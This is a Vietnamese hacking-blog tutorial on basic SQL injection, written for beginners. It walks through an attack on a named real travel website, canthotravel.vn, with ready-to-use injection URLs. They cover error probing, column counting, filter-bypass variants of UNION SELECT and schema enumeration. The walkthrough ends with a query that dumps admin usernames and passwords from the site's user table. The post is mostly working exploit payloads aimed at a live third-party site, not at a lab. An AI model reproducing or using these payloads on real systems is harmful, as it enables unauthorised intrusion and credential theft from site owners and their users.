• Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • DDOS
    • Kali Linux / Parrot
    • SQL Injection
    • Virus-Trojan-Rat
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
  • Tin tức
  • Kiến thức
AnonyViet
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • DDOS
    • Kali Linux / Parrot
    • SQL Injection
    • Virus-Trojan-Rat
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
  • Tin tức
  • Kiến thức
No Result
View All Result
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • DDOS
    • Kali Linux / Parrot
    • SQL Injection
    • Virus-Trojan-Rat
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
  • Tin tức
  • Kiến thức
No Result
View All Result
AnonyViet
No Result
View All Result

SQLi cơ bản dành cho newbie

AnonyViet by AnonyViet
10/12/2015 - Updated on 16/12/2020
in SQL Injection
3

Đề bài là hãy show user và pass của victim : canthotravel.vn bắt đầu nào
Step 1 : Thêm ‘ để kiểm tra xem site đó trả về như thế nào . ngoài cách thêm ‘ ta còn có thể sử dụng các cách khác như

PHP:
And 1=0
And 1=1
"
')
")

 

Các bài viết liên quan

Tool khai thác lỗi SQL Injection với SQLi Dumper v8.2 Full 8

Download SQLi Dumper v10.1 Full – Tool khai thác lỗi SQL Injection

11/02/2020 - Updated on 16/12/2020
SQLMap v1.2.9 - Công cụ khai thác lỗ hổng SQL Injection mạnh nhất 3

SQLMap v1.2.9 – Công cụ khai thác lỗ hổng SQL Injection mạnh nhất

11/09/2018 - Updated on 16/12/2020
Thực hành khai thác lỗi SQL injection với Sqli-labs 4

Thực hành khai thác lỗi SQL injection với Sqli-labs

11/08/2018 - Updated on 16/12/2020
Hướng dẫn khai thác lỗ hổng của Sekat CMS 5

Hướng dẫn khai thác lỗ hổng của Sekat CMS

18/03/2017 - Updated on 16/12/2020

Ví dụ thực thế vào victim

PHP:
http://www.canthotravel.vn/bs/index.php?mod=tintuc&id=1387986664'
http://www.canthotravel.vn/bs/index.php?mod=tintuc&id=1387986664')
http://www.canthotravel.vn/bs/index.php?mod=tintuc&id=1387986664+and+1=0--+

 

Sau khi đã kiểm tra xong ta xác định site này dính lỗi SQLi vì nó bị mất hết nội dung
Step 2 : Ta lại tiếp tục kiếm các cột của nó có 2 cách để tìm được cột nó bằng

PHP:
ORDER BY 1-- -
GROUP BY 1-- -

 

Nó cũng khá là dễ nên không nói sâu vào

PHP:
http://www.canthotravel.vn/bs/index.php?mod=tintuc&id=1387986664+order+by+10--+

http://www.canthotravel.vn/bs/index.php?mod=tintuc&id=1387986664+order+by+50--+

http://www.canthotravel.vn/bs/index.php?mod=tintuc&id=1387986664+order+by+1000--+

 

Tại sao lạ thế ta đã thử hết mà nó cũng không ra cột lỗi ta thử xét truy vấn đầu vào thêm ‘ sau id xem nào

PHP:
http://www.canthotravel.vn/bs/index.php?mod=tintuc&id=1387986664%27+order+by+10--+

http://www.canthotravel.vn/bs/index.php?mod=tintuc&id=1387986664%27+order+by+6--+

http://www.canthotravel.vn/bs/index.php?mod=tintuc&id=1387986664%27+order+by+5--+

 

Cột lỗi đã xuất hiện cột lỗi là 5
Step 3 : Ta tiếp tục dùng lệnh UNION SELECT để khai thác nó site này mình check thử trước rồi không cần phải bypass nhưng đối với 1 vài site khác cần bypass đoạn này thì các bạn cứ áp dụng các cách bypass 403 404

PHP:
/*!UNION*/ SELECT
/*!UNION SELECT */
UNION /*!SELECT */
/*!50000UNION*/ /*!50000SELECT */
UnIoN SeLeCT
UNION /*!50000SELECT*/

 

Xem thêm:  Joomla com_adsmanager Exploit

Còn nhiều nữa nhưng bạn cứ thử các cách trên là để bypass cơ bản nhất tiếp tục nào

PHP:
http://www.canthotravel.vn/bs/index.php?mod=tintuc&id=1387986664%27+union+select+1,2,3,4,5--+

 

Vẫn không xuất hiện gì bây giờ ta cũng có 2 cách 1 là ta thêm – trước id= ví dụ id=-1 cách 2 là ta thay thế id= là NULL ví dụ id=NULL

PHP:
http://www.canthotravel.vn/bs/index.php?mod=tintuc&id=-1387986664%27+union+select+1,2,3,4,5--+
http://www.canthotravel.vn/bs/index.php?mod=tintuc&id=NULL%27+union+select+1,2,3,4,5--+

 

Số xuất hiện là 2 và 4 ở đây tôi chọn số 4
Step 4 : Bây giờ tới đây ta chèn vào ngay vị trí của số 4 như sau

GROUP_CONCAT(TABLE_NAME)

và sau cùng ta thêm

FROM information_tables WHERE table_schema=database()– –

để có thể khai thác được table name của web đó

PHP:
http://www.canthotravel.vn/bs/index.php?mod=tintuc&id=NULL%27+union+select+1,2,3,GROUP_CONCAT(TABLE_NAME),5+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()--+

 

Phù lúc này ta có được các table sau

binhluan,category,categoryl,cauhinh,cauhinhsanpham,chitietdatphong,chitietdatthucdon,chucnang,configmail,ctydulich,danhgiadoanhnghiep,datphong,dattours,feedrss,help,hinhthucdongia,hoidap,hotrott,huyen,huyenl,infoweb,khachhang,khachsan,khachsanl,khuvuc,khuyenmai,languages,lienhe,lkweb,loaihinhdulich,loaihinhdulichl,loaiphong,loaiphongl,loaiphongt,loaiphongtt,loaitin,loaitinl,loaitour,media,nhomtin,nhomtinl,noinhan,product,productl,quangcao,quanly,quocgia,sec_audit_fld,sec_audit_logon_errors,sec_audit_session,sec_audit_transaction,sec_host,sec_language,sec_module,sec_module_form,sec_module_list,sec_page,sec_role,sec_role_task,sec_session,sec_site,sec_site_language,sec_site_them,sec_system,sec_system_host,sec_task,sec_trans_cat,sec_trans_unit,sec_user,sec_vfs,sec_vfs_data,site_counter,support_online,support_online_group,thanhvien,thucdon,tieuchuan,tieuchuanl,tinh,tinhl,tinnhan,tintuc,tintucl,tours,toursl,trangthai,yeucaukhac

Chà khá là nhiều ta không quan tâm đề kêu là kiếm admin ta xem sơ qua và thấy sec_user ta chọn table này và tiếp tục khai thác nó
Step 5 : Ta sử dụng query cũng giông như step 4 nhưng ta lại thay đổi chữ table_name thành column_name và table_schema=database thành table_name=Mã hex table

GROUP_CONCAT(COLUMN_NAME)
FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=MÃ HEX TABLE

Mã hex table có nghĩ là bạn phải hex cái table mà bạn chọn có nhiều website hỗ trợ tính năng hex thậm chí ngay cả firefox bạn cũng có thể web hỗ trợ

http://www.convertstring.com/vi/EncodeDecode/HexEncode

Ở đây ta chọn table sec_user nên hex nó => 0x7365635f75736572 nhớ phải thêm 0x trước mã hex
câu lênh hoàn chỉnh

PHP:
http://www.canthotravel.vn/bs/index.php?mod=tintuc&id=NULL%27+union+select+1,2,3,GROUP_CONCAT(COLUMN_NAME),5+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x7365635f75736572--+

 

kết quả nhận được là

user_id,username,role_id,user_code,user_password,salt,algorithm,firstname,lastname,email,phone,user_desc,created_by,created_at,updated_at,updated_by,ip_address,start_date,end_date,login_date,login_time,pwd_chg_date,pwd_chg_time,pwd_count,in_use,is_active,company_id

Step 6 : Ok đã có đầy đủ .. Table : Sec_user ; data column là : username và user_password ta tiến hành bước cuối nào

GROUP_CONCAT(USERNAME,0X7C,USER_PASSWORD)
+FROM+sec_user–+

áp dụng vào site

PHP:
http://www.canthotravel.vn/bs/index.php?mod=tintuc&id=null%27+union+select+1,2,3,group_concat(username,0x7c,user_password),5+from+sec_user--+

 

Xem thêm:  SQLMap v1.2.9 - Công cụ khai thác lỗ hổng SQL Injection mạnh nhất

Hehe xong bài :) Cảm ơn các bạn đã xem

Tags: sql injectionsqli
Previous Post

SỬA LỖI START MENU CỦA WIN 10 KHÔNG HOẠT ĐỘNG

Next Post

Cách tìm IP của web dùng Cloudflare

AnonyViet

AnonyViet

Kiến thức như một ngọn lửa, càng chia sẽ nó sẽ càng bùng cháy!

Related Posts

Tool khai thác lỗi SQL Injection với SQLi Dumper v8.2 Full 8
SQL Injection

Download SQLi Dumper v10.1 Full – Tool khai thác lỗi SQL Injection

11/02/2020 - Updated on 16/12/2020
SQLMap v1.2.9 - Công cụ khai thác lỗ hổng SQL Injection mạnh nhất 5
SQL Injection

SQLMap v1.2.9 – Công cụ khai thác lỗ hổng SQL Injection mạnh nhất

11/09/2018 - Updated on 16/12/2020
Hướng dẫn code kiểm tra lỗ hổng bảo mật Sql Injection với Python script và cách phòng chống. 9
SQL Injection

Hướng dẫn code kiểm tra lỗ hổng bảo mật Sql Injection với Python script và cách phòng chống.

21/06/2017 - Updated on 16/12/2020
SQLI Hunter v1.2 - Tự động tìm lỗi SQL Injection
SQL Injection

SQLI Hunter v1.2 – Tự động tìm lỗi SQL Injection

27/12/2015 - Updated on 16/12/2020
Dork SQL 2015
SQL Injection

Dork SQL 2015

21/12/2015 - Updated on 16/12/2020
Hướng dẫn sử dụng SQLMap 2
SQL Injection

Hướng dẫn sử dụng SQLMap

10/12/2015 - Updated on 16/12/2020
Next Post
Cách tìm IP của web dùng Cloudflare

Cách tìm IP của web dùng Cloudflare

guest
guest

Website này sử dụng Akismet để hạn chế spam. Tìm hiểu bình luận của bạn được duyệt như thế nào.

3 Comments
oldest
newest most voted
Inline Feedbacks
View all comments
Lâm Trung Tính | <span class="wpdiscuz-comment-count">948 comments</span>
Lâm Trung Tính | 948 comments
3 years ago

Mình vào web mà soa nó cứ báo là ”Làm ơn hãy bật JavaSqrit” là sao ad

0
Reply
Lâm Trung Tính | <span class="wpdiscuz-comment-count">948 comments</span>
Lâm Trung Tính | 948 comments
3 years ago

Bài viết này rất có ích cho newbie thanks ad rất nhiều :V

0
Reply
Hisoka | <span class="wpdiscuz-comment-count">1 comments</span>
Hisoka | 1 comments
3 years ago

Yêu đấy :3

0
Reply

Liên hệ Quảng Cáo

Lien he AnonyViet

Đối tác

Fshare

Các bài mới

Ping of Death ddos

Ping of Death là gì? Thực hiện Ping of Death để DDOS như thế nào?

24/01/2021
Download Burp Suite 2020.12 Pro Full Key - Cách Active bản quyền 6

Download Burp Suite 2020.12 Pro Full Key – Cách Active bản quyền

24/01/2021
Cách chọn thức ăn theo Nhóm Máu để cường tăng sức khỏe

Cách chọn Thức Ăn theo Nhóm Máu để cường tăng sức khỏe

23/01/2021
Cách cài đặt Docker trên Ubuntu 20.04 LTS 7

Cách cài đặt Docker trên Ubuntu 20.04 LTS

23/01/2021
logo seed4me

Nhận bản quyền License 6 tháng VPN của Seed4Me

23/01/2021

Ads

Giới thiệu

AnonyViet

AnonyViet

Nơi chia sẻ những kiến thức mà bạn chưa từng được học trên ghế nhà trường!

Chúng tôi sẵn sàng đón những ý kiến đóng góp, cũng như bài viết của các bạn gửi đến AnonyViet.

Hãy cùng AnonyViet xây dựng một cộng đồng CNTT lớn mạnh nhất!

Giới thiệu

AnonyViet là Website chia sẻ miễn phí tất cả các kiến thức về công nghệ thông tin. AnonyViet cung cấp mọi giải pháp về mạng máy tính, phần mềm, đồ họa và MMO.

Liên kết

Game B52 |  Tải game đổi thưởng online | Chơi game bài hot 2020 | Chơi game bài đổi thưởng online | Gam Víp | 88vin link

Liên hệ đặt Ads: [email protected]

Liên hệ

Email: anonyviet.com[@]gmail.com

1409 Hill Street #01-01A
Old Hill Street Police Station
Singapore 179369

Bài viết mới

  • Ping of Death là gì? Thực hiện Ping of Death để DDOS như thế nào?
  • Download Burp Suite 2020.12 Pro Full Key – Cách Active bản quyền
  • Cách chọn Thức Ăn theo Nhóm Máu để cường tăng sức khỏe
  • Cách cài đặt Docker trên Ubuntu 20.04 LTS
  • Nhận bản quyền License 6 tháng VPN của Seed4Me
  • 11 Tiện ích Chrome tăng năng suất học tập cho Học Sinh Sinh Viên
  • Giới thiệu về AnonyViet
  • Liên hệ Quảng cáo
  • Privacy & Policy
  • Contact

© 2019 AnonyViet - Chúng tôi mang đến cho bạn những kiến thức bổ ích về Công nghệ.

No Result
View All Result
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • DDOS
    • Kali Linux / Parrot
    • SQL Injection
    • Virus-Trojan-Rat
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
  • Tin tức
  • Kiến thức

© 2019 AnonyViet - Chúng tôi mang đến cho bạn những kiến thức bổ ích về Công nghệ.

wpDiscuz